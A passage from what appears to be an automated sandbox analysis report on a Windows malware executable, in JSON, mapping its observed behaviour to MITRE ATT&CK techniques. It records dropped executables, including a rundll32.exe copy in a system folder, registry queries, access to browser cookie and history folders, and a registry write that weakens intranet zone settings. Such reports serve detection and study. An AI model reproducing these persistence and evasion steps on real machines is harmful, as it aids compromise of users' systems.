\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\Windows\\IEXPLORE.EXE\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\Windows\\IEXPLORE .EXE\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\ERROR MESSAGE INSTRUMENT\"; Key: \"\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IME COMPATIBILITY\"; Key: \"\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\"; Key: \"\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"rundll32.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" writes file \"c:\\windows\\system32\\¢«.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" touched file \"C:\\Windows\\System32\\¢«.exe\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" touched file \"C:\\Windows\\System32\\notepad¢¬.exe\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" touched file \"C:\\Windows\\system\"\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" touched file \"C:\\Windows\\system\\rundll32.exe\"\n \"rundll32.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"rundll32.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\"\n \"rundll32.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\"\n \"rundll32.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\History\"\n \"rundll32.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"rundll32.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\"\n \"rundll32.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Cookies\"\n \"rundll32.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\History\"\n \"rundll32.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-235", "type": 6, "relevance": 1, "name": "Queries basic information of the specified process", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" queries basic process information of the \"C:\\Windows\\system\\rundll32.exe\" (UID: 5944)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" connecting to \"\\ThemeApiPort\"\n \"rundll32.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"rundll32.exe\" trying to access non-existent file \"C:\\Windows\\system\\WINSPOOL.DRV\"\n \"rundll32.exe\" trying to access non-existent file \"\\DEVICE\\NETBT_TCPIP_{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"\n \"rundll32.exe\" trying to access non-existent file \"\\DEVICE\\NETBT_TCPIP_{AC07BF4D-B150-47EB-A71E-488912826651}\"\n \"rundll32.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"rundll32.exe\" trying to access non-existent file \"C:\\Windows\\system\\RUNDLL32.EXE.LOCAL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"3EC2E13ED994079D492E1B17988EB95C657340CA24BFCB65D52C5810C39EA7C8\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\CMF\\CONFIG\"; Key: \"SYSTEM\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\WINDOWS ERROR REPORTING\\WMR\"; Key: \"DISABLE\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\MSIPV\"; Key: \"MAINVER\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"BIAS\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDNAME\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDBIAS\"; Value: \"\")\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TIMEZONEINFORMATION\"; Key: \"STANDARDSTART\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"notepad_.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"_.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"RUNDLL32.EXE.67A47D15.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"rundll32.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\system\\rundll32.exe]- [targetUID: 00000000-00005944]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-140", "type": 6, "relevance": 3, "name": "Calls an API typically used to find a resource in a module", "description": "\"rundll32.exe\" called \"FindResourceA\" with parameter \"128\" - (UID: 00000000-00004384)\n \"rundll32.exe\" called \"FindResourceA\" with parameter \"102\" - (UID: 00000000-00004384)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"rundll32.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005944)\n \"rundll32.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100771a000000b493367700000000984a2e00406b2c00606c2c0018a1310008702c0095e11f779cf01200feffffffd4f1120095e11f77b47e0700feffffffff2b23779a2a2377f8f1120000f3120020f21200340000c06cf11200e7382377ec382377c8933677340000c020f2120000f31200 (UID: 00000000-00004384)\n \"rundll32.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310077ec382377b493367724f21200105e227758f11200e8f012001c5e227764f2120095e11f77d47a0700feffffffec38237761d63977340000c05d0dcb7610f312006ed639778c0100004cf2120054f21200ff2b237750f212000200000000000000000000008c010000d00a320058f11200 (UID: 00000000-00004384)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00005944)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-144", "type": 6, "relevance": 3, "name": "Calls an API typically used to open an existing named mutex object", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"OpenMutexW\" with parameter \"Local\\MSCTF.Asm.MutexDefault1\" - (UID: 00000000-00005944)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-150", "type": 6, "relevance": 5, "name": "Calls an API typically used to get handle of currently active window", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"GetActiveWindow\" (UID: 00000000-00005944)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000160098151900000000002900002900000000c8171900a8371900a84f1900480100000000160000400000981519003cf712000464237738011600e0632377d5a23677000000000000160000001600604f1900000000000800000800000000a84f1900a0151900080d1900400000000000160000000100604f190088f712000464237738011600e063237761a236770000000000001600684f19000000000003000000 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000001600a03f1900000000002900002900000000d0411900584d1900a8071900480100000000160000400000a03f19003cf712000464237738011600e0632377d5a236770000000000001600a83f1900000000000000000000000000000000000000000000000000707619005001160000000000000016005001160000000000000000005001160002000002000000002f3f00106e00000000000000000000000300000000000000800000007f070000000000002f3f00106e0000000000000070761900 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001600a03f1900000000002900002900000000d0411900584d1900a8071900480100000000160000400000a03f19003cf712000464237738011600e0632377d5a236770000000000001600a83f1900000000000000000000000000000000000000000000000000707619005001160000000000000016005001160000000000000000005001160002000002000000002f3f00106e0000000000000000000000030000000000000080000000 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001600a03f1900000000002900002900000000d0411900584d1900f8071900480100000000160000400000a03f19003cf712000464237738011600e0632377d5a23677000000000000160000001600a0071900000000000500000500000000f8071900584d1900080d1900280000000000160000800000a007190088f712000464237738011600e063237761a236770000000000001600a80719000000000003000000 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001600a03f1900000000002900002900000000d0411900584d1900a8071900480100000000160000400000a03f19003cf712000464237738011600e0632377d5a236770000000000001600a83f1900000000000000000000000000000000000000000000000000708619005001160000000000000016005001160000000000000000005001160002000002000000002f3d00126e000000000000000000000003000000 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000001600a03f1900000000002900002900000000d0411900584d1900a8071900480100000000160000400000a03f19003cf712000464237738011600e0632377d5a236770000000000001600a83f1900000000000000000000000000000000000000000000000000708619005001160000000000000016005001160000000000000000005001160002000002000000002f3d00126e00000000000000000000000300000000000000800000007f070000000000002f3d00126e0000000000000070861900 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000065786500000000000000e02116001cf9120000000000c0f91200ebdb427500003577a0000000d0f91200dfc7237740832b77bec7237739ac3677ebdb4275a0000000000035770000000000000000000000009cf91200000000007cfd120095e11f7739530700feffffffbec72377548e367500003577ffffffff08e04000a84e400000003577a8e340000900000000000000ffffffff0000000000003577a000000025653b77280100000000000038170000000000000000000003000000b00800000800000000000000336563326531336564393934303739643439326531623137 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001600a03f1900000000002900002900000000d0411900584d1900a8071900480100000000160000400000a03f1900a8fa12000464237738011600e063237741af36770000000000001600a83f1900000000000000000000000000000000000000000000000000708619005001160000000000000016005001160000000000000000005001160002000002000000002f3d00126e00000000000000000000000300000000000000 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001600a03f1900000000002900002900000000d0411900584d1900e8071900480100000000160000400000a03f1900a8fa12000464237738011600e063237741af3677000000000000160000001600a0071900000000000700000700000000e8071900584d1900080d1900380000000000160000800000a0071900f4fa12000464237738011600e06323771daf36770000000000001600a8071900000000000300000000000000 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000500116000000000000000000584d1900a83f190001011200420000000000000096000001000000001002000001000101d0e3120000000000a0e5120095e11f77e1470700feffffffe06323771664237700000000584d1900ac00000004e5120000000000504d1900e4e412005c5523770000160000000000584d1900f4e412003c5e22778dc53675ac00000008e5120010e512000800000004000000f8e5120000000000080000000700000000000000ac000000f8e5120064e5120044a3437503000000ac000000f8e5120000000000000000000c0000000000000001000000 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000237700000000000000000000000020b01800c075417720b0180000000000c0754177b8fa120079da3977c07541770200000010fb120072dc39770000000079dc397731b0548585fc12006cfb1200ffffffff00000000000000000000000000000000c715cb760000000020b018001a000000c8fa12000000000078fd1200c2a23f77a1977ff2feffffff79dc39775edb39772c0000003cdf4000000000003f000f005cfb120000000000aedb4275cf444000020000803cdf40006cfb1200d04340007cdf40006cfb120078fd120058a6400000000000ee684000a8e3400009000000 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000016000000000000000000584d1900a83f190001011200420000000000000096000001000000001002000001000101f4e4120000000000c4e6120095e11f77e1470700feffffffe06323771664237700000000584d1900a800000028e6120000000000504d190008e612005c5523770000160000000000584d190018e612003c5e22778dc53675a80000002ce6120034e6120008000000040000001ce7120000000000080000000700000000000000a80000001ce7120088e6120044a3437503000000a80000001ce7120000000000000000000c000000000000000100000000000000 (UID: 00000000-00005944)\n \"3ec2e13ed994079d492e1b17988eb95c657340ca24bfcb65d52c5810c39ea7c8.exe\" called 